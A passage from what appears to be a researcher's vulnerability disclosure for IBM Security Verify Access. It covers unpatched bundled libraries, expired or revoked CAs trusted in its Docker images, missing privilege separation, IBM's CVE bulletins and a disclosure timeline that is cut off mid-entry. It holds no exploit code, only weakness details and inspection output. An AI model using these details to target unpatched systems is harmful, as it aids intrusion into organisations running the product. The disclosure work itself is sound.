1 non-assigned CVE vulnerability\n\nThe `/opt/pdweb/lib/libmodsecurity.so.3` library (b939c5db3ca94073188ea6eb360049f58f9e9d2a9c7d72bc052d9ee47cc5eccc) contains a vulnerable libinjection library. The version used is 3.9.2:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThis version (3.9.2) is known to have several vulnerabilities. For example, a pre-authentication DoS (https://github.com/SpiderLabs/ModSecurity/issues/1412) from 2017 (no CVE). \n\nThis version is confirmed to be vulnerable: https://github.com/client9/libinjection/issues/124. \n\n\n\n### libtivsec_yamlcpp.so - 4 CVEs\n\nThis IBM library is entirely based on yaml-cpp. Yaml-cpp is available at https://github.com/jbeder/yaml-cpp. \n\nSeveral vulnerabilities have been patched in 2020 (CVE-2017-5950, CVE-2018-20573, CVE-2018-20574 and CVE-2019-6285) in the yaml-cpp library. \n\nThis IBM-specific library is located at `/usr/lib64/libtivsec_yamlcpp.so` and `/opt/ibm/Tivoli/SecUtilities/lib/libtivsec_yamlcpp.so` (cf1b80c501a2f42948322567477c2956155e244d645e3962985569c4496ffad90). \n\nWhen doing reverse engineering on this file, it appears no security patches have been imported from the official yaml-cpp repository. \n\nWe can identify several methods from the yaml-cpp library. For example, the method `SingleDocParser::HandleFlowMap()` found in `/usr/lib64/libtivsec_yamlcpp.so` and `/opt/ibm/Tivoli/SecUtilities/lib/libtivsec_yamlcpp.so`:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nWhen analyzing the security patches available at https://github.com/jbeder/yaml-cpp/pull/807 and https://github.com/jbeder/yaml-cpp/pull/807/files/dbd5ac094622ef3b3951e71c31f59e02c930dc4b, there is no reference in the compiled code regarding a `DeepRecursion` class or any method implemented in the security patches. This `DeepRecursion` class is included in the now-patched versions. \n\nThe IBM-specific library is using an outdated and vulnerable version of yaml-cpp, without security patches, e.g. 4 CVEs patched in yaml-cpp - https://github.com/jbeder/yaml-cpp/pull/807. \n\nAnalysis of the security patches implementing new classes:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nFurthermore, it is possible to analyze the rest of the security patches from the git repository and compare them with the assembly code from the `libtivsec_yamlcpp.so` library. This allows us to conclude the security patches have not been imported into the `libtivsec_yamlcpp.so` library. \n\nSource code providing security patches:\n\nMethod `HandleNode()` from the security patches and the patched versions of yaml-cpp:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nWith the assembly code extracted from the `libtivsec_yamlcpp.so` library and rebuilt into pseudo-code, we can identify the same logic and the same instructions (minus some errors due to the reconstruction from assembly to C++) - with the lack of the patch located on the line 51. \n\nPseudo-code of method `HandleNode()`:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThis allows us to conclude that the `libtivsec_yamlcpp.so` library is vulnerable to these 4 CVEs. \n\n\n\n### libtivsec_xml4c.so - outdated Xerces-C library\n\nThis library (8b3d3d2dcb1152966d097e91e08fa1dc4300f3653f1c264eeecaf20bb1550832) is located in `/usr/lib64/libtivsec_xml4c.so` and `/opt/ibm/Tivoli/SecUtilities/lib/libtivsec_xml4c.so`) and uses outdated code from XML4C 5.5.0 that includes a version of Xerces-C (XML4C doesn\u0027t exist anymore and the latest release appears to be from 2007-2008). \n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nThis version appears to be quite outdated and is likely vulnerable to known CVEs (https://xerces.apache.org/xerces-c/secadv.html). \n\n\n\n## Details - Outdated and untrusted CAs used in the Docker images\n\nIt was observed that the Docker images will trust invalid Certificate Authorities (CA). \n\nUsing the Paranoia program, we can list the invalid, expired and revoked CAs that are trusted inside the 4 Docker images. \n\nIt appears that these 4 Docker images trust some invalid, revoked or untrusted CAs. \n\nResults for ibmcom/verify-access:10.0.4.0:\n\n\u003cpre\u003e\nkali-docker# paranoia inspect ibmcom/verify-access:10.0.4.0\nCertificate CN=VeriSign Class 3 Public Primary Certification Authority - G5,OU=VeriSign Trust Network+OU=(c) 2006 VeriSign\\, Inc. - For authorized use only,O=VeriSign\\, Inc.,C=US\n removed from Mozilla trust store, no reason given\n\nCertificate CN=DigiCert ECC Secure Server CA,O=DigiCert Inc,C=US\n expires soon ( expires on 2023-03-08T12:00:00Z, 19 weeks 2 days until expiry)\n\nCertificate CN=Test CA,O=genua mbh\n expired ( expired on 2014-10-23T08:22:40Z, 8 years 3 days since expiry)\n\nCertificate CN=Cybertrust Global Root,O=Cybertrust\\, Inc\n expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. \n\nCertificate CN=DST Root CA X3,O=Digital Signature Trust Co. \n expired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry)\n removed from Mozilla trust store, no reason given\n\nCertificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR\n expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)\n\nCertificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign\n expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: Ownership transferred to GTS:\nhttps://bug1325532.bmoattachments.org/attachment.cgi?id=8844281\n\nCertificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR\n removed from Mozilla trust store, no reason given\n\nCertificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL\n expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)\n\nCertificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU\n removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1410277\n\nCertificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign\n expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: Ownership transferred to GTS:\nhttps://bug1325532.bmoattachments.org/attachment.cgi?id=8844281\n\nCertificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR\n removed from Mozilla trust store, no reason given\n\nCertificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU\n removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1410277\n\nCertificate CN=Cybertrust Global Root,O=Cybertrust\\, Inc\n expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. \n\nCertificate CN=DST Root CA X3,O=Digital Signature Trust Co. \n expired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry)\n removed from Mozilla trust store, no reason given\n\nCertificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR\n expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)\n\nCertificate CN=DigiNotar PKIoverheid CA Organisatie - G2,O=DigiNotar B.V.,C=NL\n expired ( expired on 2020-03-23T09:50:05Z, 2 years 30 weeks since expiry)\n\nCertificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign\n expired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: Ownership transferred to GTS:\nhttps://bug1325532.bmoattachments.org/attachment.cgi?id=8844281\n\nCertificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR\n removed from Mozilla trust store, no reason given\n\nCertificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL\n expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)\n\nCertificate CN=sks-keyservers.net CA,O=sks-keyservers.net CA,ST=Oslo,C=NO\n expired ( expired on 2022-10-07T00:33:37Z, 2 weeks 3 days since expiry)\n\nFound 395 certificates total, of which 21 had issues\n\u003c/pre\u003e\n\n\n\nResults for:\n\n- - ibmcom/verify-access-runtime:10.0.4.0\n- - ibmcom/verify-access-wrp:10.0.4.0 \n- - ibmcom/verify-access-dsc:10.0.4.0\n\n\u003cpre\u003e\nkali-docker# paranoia inspect ibmcom/verify-access-runtime:10.0.4.0\nCertificate CN=Cybertrust Global Root,O=Cybertrust\\, Inc\nexpired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. \n\nCertificate CN=DST Root CA X3,O=Digital Signature Trust Co. \nexpired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry)\n removed from Mozilla trust store, no reason given\n\nCertificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR\n expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)\n\nCertificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign\nexpired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: Ownership transferred to GTS:\nhttps://bug1325532.bmoattachments.org/attachment.cgi?id=8844281\n\nCertificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR\n removed from Mozilla trust store, no reason given\n\nCertificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL\n expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)\n\nCertificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU\n removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59\n\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1410277\nCertificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign\nexpired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: Ownership transferred to GTS:\nhttps://bug1325532.bmoattachments.org/attachment.cgi?id=8844281\n\nCertificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR\n removed from Mozilla trust store, no reason given\n\nCertificate CN=Global Chambersign Root,OU=http://www.chambersign.org,O=AC Camerfirma SA CIF A82743287,C=EU\n removed from Mozilla trust store, comments: Websites trust bit turned off in NSS 3.35, Firefox 59\n\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1410277\nCertificate CN=Cybertrust Global Root,O=Cybertrust\\, Inc\nexpired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: June 2015: DigiCert acquired this root cert from Verizon. \n\nCertificate CN=DST Root CA X3,O=Digital Signature Trust Co. \nexpired ( expired on 2021-09-30T14:01:15Z, 1 year 3 weeks since expiry)\n removed from Mozilla trust store, no reason given\n\nCertificate CN=E-Tugra Certification Authority,OU=E-Tugra Sertifikasyon Merkezi,O=E-Tua EBG Bilim Teknolojileri ve Hizmetleri A.,L=Ankara,C=TR\n expires soon ( expires on 2023-03-03T12:09:48Z, 18 weeks 4 days until expiry)\n\nCertificate CN=DigiNotar PKIoverheid CA Organisatie - G2,O=DigiNotar B.V.,C=NL\n expired ( expired on 2020-03-23T09:50:05Z, 2 years 30 weeks since expiry)\n\nCertificate CN=GlobalSign,OU=GlobalSign Root CA - R2,O=GlobalSign\nexpired ( expired on 2021-12-15T08:00:00Z, 44 weeks 5 days since expiry)\n removed from Mozilla trust store, comments: Ownership transferred to GTS:\nhttps://bug1325532.bmoattachments.org/attachment.cgi?id=8844281\n\nCertificate CN=Hellenic Academic and Research Institutions RootCA 2011,O=Hellenic Academic and Research Institutions Cert. Authority,C=GR\n removed from Mozilla trust store, no reason given\n\nCertificate CN=Staat der Nederlanden EV Root CA,O=Staat der Nederlanden,C=NL\n expires soon ( expires on 2022-12-08T11:10:28Z, 6 weeks 3 days until expiry)\n\nCertificate CN=sks-keyservers.net CA,O=sks-keyservers.net CA,ST=Oslo,C=NO\n expired ( expired on 2022-10-07T00:33:37Z, 2 weeks 3 days since expiry)\n\nFound 374 certificates total, of which 18 had issues\n\u003c/pre\u003e\n\nThe communications used in the ISVA platform use SSL/TLS with a trust entirely based on underlying CAs. Some CAs have been revoked and cannot be trusted anymore. \n\nThe presence of revoked and expired CAs also shows that the security of the Docker images is highly perfectible. \n\n\n\n## Details - Lack of privilege separation in Docker instances\n\nIt was observed that the Docker images do not implement privilege separation. Privilege separation is a software-based implementation of the principle of least privilege. \n\nUsing dynamic analysis, the ibmcom/verify-access-wrp:10.0.4.0 Docker image, ibmcom/verify-access:10.0.4.0 Docker image, and the ibmcom/verify-access-runtime Docker image do not correctly implement privilege separation. \n\nProcesses running inside the ibmcom/verify-access:10.0.4.0 Docker image:\n\n USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n isam 1 0.0 0.0 12060 2812 ? Ss Oct21 0:00 /bin/sh /sbin/bootstrap.sh\n isam 312 0.0 0.0 24532 56 ? Ss Oct21 0:00 /usr/sbin/mesa_crashd\n isam 314 0.1 0.0 24568 2056 ? R Oct21 6:20 /usr/sbin/mesa_crashd\n isam 318 0.0 0.0 69160 2732 ? Ss Oct21 0:00 /usr/sbin/mesa_syslogd\n isam 322 0.0 0.0 69224 2164 ? S Oct21 0:02 /usr/sbin/mesa_syslogd\n isam 399 0.0 0.0 102760 2740 ? Ss Oct21 0:00 /usr/sbin/mesa_eventsd -m 1000\n isam 400 0.0 0.1 711216 8276 ? Sl Oct21 0:00 /usr/sbin/mesa_eventsd -m 1000\n isam 747 0.0 0.0 270992 7452 ? Ssl Oct21 0:06 /usr/sbin/wga_watchdogd slapdw -log_file /var/application.logs.local/verify_access_runtime/user_registry/msg__user_registry.log /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap \n isam 756 0.0 0.0 271124 7308 ? Ssl Oct21 0:06 /usr/sbin/wga_watchdogd ISAM-Policy-Server -log_file /var/application.logs.local/verify_access_runtime/policy/msg__pdmgrd.log -cfg /var/PolicyDirector/etc/ivmgrd.conf /opt/PolicyDirector/bin/pdmgrd -foreground\n isam 807 0.0 0.0 71488 3084 ? Ss Oct21 0:00 /usr/sbin/iss-lum\n isam 808 0.0 0.5 343920 42140 ? Sl Oct21 0:00 /usr/sbin/iss-lum\n isam 833 0.0 0.0 128400 5140 ? Ssl Oct21 0:00 /usr/sbin/rsyslogd\n isam 873 0.0 0.0 273920 7080 ? Ssl Oct21 0:06 /usr/sbin/wga_watchdogd wga_notifications -log_file /var/log/wga_notifications.log wga_notifications -foreground\n isam 879 1.5 0.5 563872 42292 ? Sl Oct21 71:40 wga_notifications -foreground\n isam 892 0.0 0.0 12060 1804 ? S Oct21 0:00 /bin/sh /sbin/bootstrap.sh\n isam 895 0.0 0.0 23068 1256 ? S Oct21 0:00 /usr/bin/coreutils --coreutils-prog-shebang=tail /usr/bin/tail -F -n+0 /var/application.logs.local/lmi/messages.log\n isam 573957 0.0 0.0 47620 3696 pts/0 Rs+ 16:53 0:00 ps -aux\n isam 573963 0.0 0.0 11928 2852 ? S 16:53 0:00 sh -c ls /var/support/core_*.* | wc -l\n \n pgresql 434 0.0 0.2 188380 17492 ? Ss Oct21 0:06 /usr/bin/postgres -D /var/postgresql/config/data\n pgresql 435 0.0 0.0 138892 2960 ? Ss Oct21 0:00 postgres: logger\n pgresql 446 0.0 0.0 188380 2696 ? Ss Oct21 0:00 postgres: checkpointer\n pgresql 447 0.0 0.0 188516 4676 ? Ss Oct21 0:03 postgres: background writer\n pgresql 448 0.0 0.0 188380 5148 ? Ss Oct21 0:03 postgres: walwriter\n pgresql 449 0.0 0.0 189112 5312 ? Ss Oct21 0:04 postgres: autovacuum launcher\n pgresql 450 0.0 0.0 139024 3016 ? Ss Oct21 0:15 postgres: stats collector\n pgresql 451 0.0 0.0 188916 5492 ? Ss Oct21 0:00 postgres: logical replication launcher\n \n www-data 547 0.3 6.2 4925056 499744 ? SLl Oct21 18:57 /opt/java/jre/bin/java -javaagent:/opt/IBM/wlp/bin/tools/ws-javaagent.jar -Djava.awt.headless=true -Djdk.attach.allowAttachSelf=true -Dcom.sun.jndi.ldap.object.disableEndpointIdentification=true -Djava.security.properties=/opt/IBM/wlp/usr/servers/de\n \n ivmgr 761 0.0 0.5 873712 44896 ? Sl Oct21 0:04 /opt/PolicyDirector/bin/pdmgrd -foreground\n ivmgr 863 0.0 0.1 276544 8440 ? Sl Oct21 0:00 /usr/sbin/wga_servertaskd\n \n ldap 752 0.0 10.3 1314228 822572 ? Sl Oct21 0:00 /usr/sbin/slapd -d 0 -s 0 -h ldap://127.0.0.1:389 ldaps://127.0.0.1:636 -f /etc/openldap/slapd.conf -u ldap -g ldap\n \n root 813 0.0 0.0 41984 3528 ? Ss Oct21 0:01 /usr/sbin/crond\n root 862 0.0 0.0 174348 2828 ? Ss Oct21 0:00 /usr/sbin/wga_servertaskd\n\nSome processes are running as `isam`. For example, the rsyslogd processys runs as `isam`. If a program running as `isam` is compromised inside an instance, then all the programs running as isam are also compromised. \n\nProcesses running inside the ibmcom/verify-access-wrp:10.0.4.0 Docker image:\n\n PID USER TIME COMMAND\n 1 isam 9:42 /opt/pdweb/bin/webseald -foreground -noenv -config etc/webseald-login-internal.conf\n 32 isam 0:02 slapd -4 -f /etc/openldap/slapd.conf -h ldap://127.0.0.1:6389 -s 0\n\nThe only 2 processes are running as `isam`. \n\n\nProcesses running inside the ibmcom/verify-access-runtime: 10.0.4.0 Docker image:\n\n PID USER TIME COMMAND\n 1 isam 1h18 /opt/java/jre/bin/java -javaagent:/opt/ibm/wlp/bin/tools/ws-javaagent.jar -Djava.awt.headless=true -Djdk.attach.allowAttachSelf=true -Dcom.ibm.ws.logging.log.directory=/var/application.logs.local/rtprofile -Xms512m -Xmx2048m -Dcom.sun.security.enableCRLDP=true -Dsun.net.inetaddr.ttl=30 -Dhttps\n 38 isam 0:00 slapd -4 -f /etc/openldap/slapd.conf -h ldap://127.0.0.1:6389 -s 0\n 63 isam 0:04 /usr/bin/postgres -D /var/postgresql/config/data\n 64 isam 0:00 postgres: logger \n 66 isam 0:00 postgres: checkpointer \n 67 isam 0:00 postgres: background writer \n 68 isam 0:00 postgres: walwriter \n 69 isam 0:01 postgres: autovacuum launcher \n 70 isam 0:05 postgres: stats collector \n 71 isam 0:00 postgres: logical replication launcher \n 37169 isam 0:00 bash\n 37186 isam 0:00 ps -a\n\nIn the `ibmcom/verify-access-runtime` instance, we can confirm the postgres daemon is running. We can also confirm a complete lack of privilege separation: everything is running as isam. \n\nIf a program running as `isam` is compromised inside an instance, then the all the programs running as isam are also compromised. \n\n\n\n## Vendor Response\n\nIBM provided several security bulletins:\n\nSecurity Bulletin: IBM Security Verify Access is vulnerable to multiple Security Vulnerabilities - https://www.ibm.com/support/pages/node/7158790:\n\n- - CVE-2023-38371: IBM Security Access Manager uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. \n- - CVE-2024-35137: IBM Security Access Manager Appliance could allow a local user to possibly elevate their privileges due to sensitive configuration information being exposed. \n- - CVE-2024-35139: IBM Security Verify Access could allow a local user to obtain sensitive information from the container due to incorrect default permissions. \n- - CVE-2023-30998: IBM Security Access Manager Container could allow a local user to obtain root access due to improper access controls. \n- - CVE-2023-30997: IBM Security Access Manager Container could allow a local user to obtain root access due to improper access controls. \n- - CVE-2023-38368: IBM Security Access Manager Container could disclose sensitive information to a local user to do improper permission controls. \n- - CVE-2023-38370: IBM Security Access Manager Container, under certain configurations, could allow a user on the network to install malicious packages. \n\nSecurity Bulletin: Security Vulnerabilities discovered in IBM Security Verify Access - https://www.ibm.com/support/pages/node/7145400:\n\n- - CVE-2024-25027: IBM Security Verify Access could disclose sensitive snapshot information due to missing encryption. \n\nSecurity Bulletin: Multiple Security Vulnerabilities were identified in IBM Security Verify Access - https://www.ibm.com/support/pages/node/7106586:\n\n- - CVE-2023-31003: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) could allow a local user to obtain root access due to improper access controls. \n- - CVE-2023-31001: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) temporarily stores sensitive information in files that could be accessed by a local user. \n- - CVE-2023-38267: IBM Security Access Manager Appliance (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) could allow a local user to obtain sensitive configuration information. \n- - CVE-2023-31005: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a local user to escalate their privileges due to an improper security configuration. \n- - CVE-2023-30999: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow an attacker to cause a denial of service due to uncontrolled resource consumption. \n- - CVE-2023-43016: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a remote user to log into the server due to a user account with an empty password. \n- - CVE-2023-32327: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. \n- - CVE-2023-32329: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a user to download files from an incorrect repository due to improper file validation. \n- - CVE-2023-31004: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a remote attacker to gain access to the underlying system using man in the middle techniques. \n- - CVE-2023-31006: IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to a denial of service attacks on the DSC server. \n- - CVE-2023-32328: IBM Security Verify Access 10.0.0.0 through 10.0.6.1 uses insecure protocols in some instances that could allow an attacker on the network to take control of the server. \n- - CVE-2023-32330: IBM Security Verify Access 10.0.0.0 through 10.0.6.1 uses insecure calls that could allow an attacker on the network to take control of the server. \n- - CVE-2023-43017: IBM Security Verify Access 10.0.0.0 through 10.0.6.1 could allow a privileged user to install a configuration file that could allow remote access. \n- - CVE-2023-31002: IBM Security Access Manager Container 10.0.0.0 through 10.0.6.1 temporarily stores sensitive information in files that could be accessed by a local user. \n- - CVE-2023-38369: IBM Security Access Manager Container 10.0.0.0 through 10.0.6.1 does not require that docker images should have strong passwords by default, which makes it easier for attackers to compromise user accounts. \n\nSecurity Bulletin: Multiple Security Vulnerabilities were discovered in IBM Security Verify Access Container (CVE-2024-35140, CVE-2024-35141, CVE-2024-35142) - https://www.ibm.com/support/pages/node/7155356:\n\n- - CVE-2024-35140: IBM Security Verify Access could allow a local user to escalate their privileges due to improper certificate validation. \n- - CVE-2024-35141: IBM Security Verify Access could allow a local user to escalate their privileges due to execution of unnecessary privileges. \n- - CVE-2024-35142: IBM Security Verify Access could allow a local user to escalate their privileges due to execution of unnecessary privileges. \n\n\n\n## Report Timeline\n\n* October 2022: Security assessment performed on IBM Security Verify Access. \n* Feb 12, 2023: A complete report was sent to IBM. \n* Feb 13, 2023: IBM acknowledged the reception of the security assessment and said that scan tools usually report a lot of issues so I have to check the status of detected CVEs by browsing RedHat webpages and create an issue for each CVE. \n* Feb 13, 2023: Replied to IBM saying that the security assessment was not done using a scanner. \n* Feb 14, 2023: Asked for an update. \n* Feb 14, 2023: IBM confirmed that the report was shared with L3 and \"IBM hacking team\". \n* Feb 22, 2023: IBM said they were still assessing the report. \n* Mar 13, 2023: An additional report on ibmsecurity was sent to IBM. \n* Mar 13, 2023: IBM confirmed that the second report was shared with L3 team. \n* Mar 15, 2023: IBM wanted to organize a meeting about the findings. \n* Mar 15, 2023: I replied that I would like to have a written feedback for each reported vulnerability in order to have constructive discussion. \n* Apr 4, 2023: I asked again IBM to confirm the vulnerabilities\n* Apr 5, 2023: IBM shared the analysis (VulnerabilityResponse.xlsx), confirming several vulnerabilities. \n* Apr 11, 2023: I provided my comments (VulnerabilityResponse-comments-Pierre.xlsx) and asked to organize a meeting. \n* Apr 11, 2023: IBM confirmed a meeting is possible. \n* Apr 18, 2023: I asked to organize a meeting on Apr 19, 2023. \n* Apr 18, 2023: IBM confirmed a meeting is possible. \n* Apr 19, 2023: I asked to have a meeting where every party (dev team, support and myself) can be present. \n* Apr 19, 2023: IBM confirmed a meeting would take place on Apr 20, 2023. \n* Apr 20, 2023: Meeting with IBM regarding ISVA. IBM confirmed they would recheck some of the issues and would provide CVEs for the vulnerabilities. \n* Apr 23, 2023: I asked to have a second meeting about ibmsecurity. \n* Apr 23, 2023: IBM confirmed they will organize a meeting on ibmsecurity. \n* Apr 24, 2023: I asked the timeline to get security patches. \n* Apr 24, 2023: IBM confirmed there are no ETA to get security patches. \n* Apr 27, 2023: Meeting with IBM regarding ibmsecurity. IBM confirmed they will fix all the issues. \n* May 10, 2023: I asked for CVE identifiers to track the vulnerabilities. \n* May 11, 2023: IBM said that PSIRT records have been opened and the scoring is in progress. \n* May 15, 2023: I reached IBM because I found a CVE (CVE-2023-25927) and a security bulletin likely corresponding to a vulnerability I reported, thanks to @CVEnew on Twitter: https://www.ibm.com/support/pages/node/6989653. I asked if this was one of the reported vulnerabilities. \n* Jul 7, 2023: IBM said the dev team was still working on the final list of issues and that everything would be fixed in the 10.0.7 release. \n* Jul 10, 2023: I asked when the 10.0.7 release would be available. I asked again more details about the previous advisory. \n* Jul 11, 2023: IBM said that the 10.0.7 release would be published on Dec 23, 2023. Regarding the CVEs, IBM replied they would need to discuss with the dev team. \n* Jul 12, 2023: I asked IBM to confirm if CVE-2023-25927 was one of the reported vulnerabilities. \n* Jul 12, 2023: IBM said that they do not credit security researchers. \n* Jul 13, 2023: I provided several IBM security bulletins where security researchers were credited, e.g. https://www.ibm.com/support/pages/security-bulletin-vulnerabilities-exist-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430. \n* Jul 14, 2023: IBM confirmed that they would forward the information to L3 team and asked what I would want to do with this case. \n* Jul 14, 2023: I said that (1) I was still waiting for information about CVE-2023-25927, (2) I did not have any information regarding security patches for ibmsecurity and (3) I asked IBM to provide me with the final list of vulnerabilities that would be patched in the 10.0.7. Since the list of confirmed vulnerabilities was quite long, I wanted to confirm that nothing was missed. \n* Jul 28, 2023: IBM said that they did not know if CVE-2023-25927 is one of the reported vulnerabilities and in any case, it is impossible to edit the security bulletin and give credits. \n* Aug 16, 2023: IBM asked if additional assistance was required [NB: IBM likely wanted to close this ticket while no security patches were published]. \n* Aug 17, 2023: I asked again information about ibmsecurity and CVE-2023-25927. \n* Oct 20, 2023: IBM said they were still analysing the requests (final list of patched vulnerabilties, security patches of ibmsecurity and status of CVE-2023-25927). \n* Oct 25, 2023: IBM asked to organize a meeting. \n* Oct 25, 2023: I replied that I was still waiting for the final list of vulnerabilities that would be fixed in version 10.0.7. There was also no information regarding security patches for ibmsecurity. \n* Oct 25, 2023: IBM replied they wanted to discuss about the vulnerabilities in a meeting. \n* Oct 29, 2023: IBM asked to organize a meeting again. \n* Oct 30, 2023: I accepted the meeting and I asked IBM to provide the list of vulnerabilities that would be patched with their current status. I also asked the status of ibmsecurity. \n* Oct 30, 2023: IBM asked to have a meeting on Nov 7, 2023. \n* Nov 2, 2023: I confirmed my presence to the meeting. \n* Nov 5, 2023: IBM confirmed the meeting. \n* Nov 7, 2023: Meeting with IBM. IBM provided me with a new report containing new feedbacks for several vulnerabilities. Also IBM confirmed that several vulnerabilities would be patched in 2024 and ibmsecurity would be patched in December 2023. IBM asked me to review a specific vulnerability that appears to be invalid (_V-[REDACTED] - Insecure SSLv3 connections to the DSC servers_). \n* Nov 21, 2023: IBM asked me to review the new report shared by IBM. \n* Nov 28, 2023: IBM asked for updates. \n* Dec 4, 2023: I answered that I did not have anymore access to the test infrastructure and IBM had to wait for my analysis until I get again access to the test infrastructure. \n* Dec 4, 2023: IBM asked me to check the vulnerabilities as soon as possible. \n* Dec 21, 2023: I got access to a test infrastructure and reviewed some vulnerabilities. \n* Dec 21, 2023: I sent a new analysis to IBM, containing details of 4 vulnerabilities. \n* Dec 27, 2023: IBM confirmed the reception of the new analysis. \n* Jan 15, 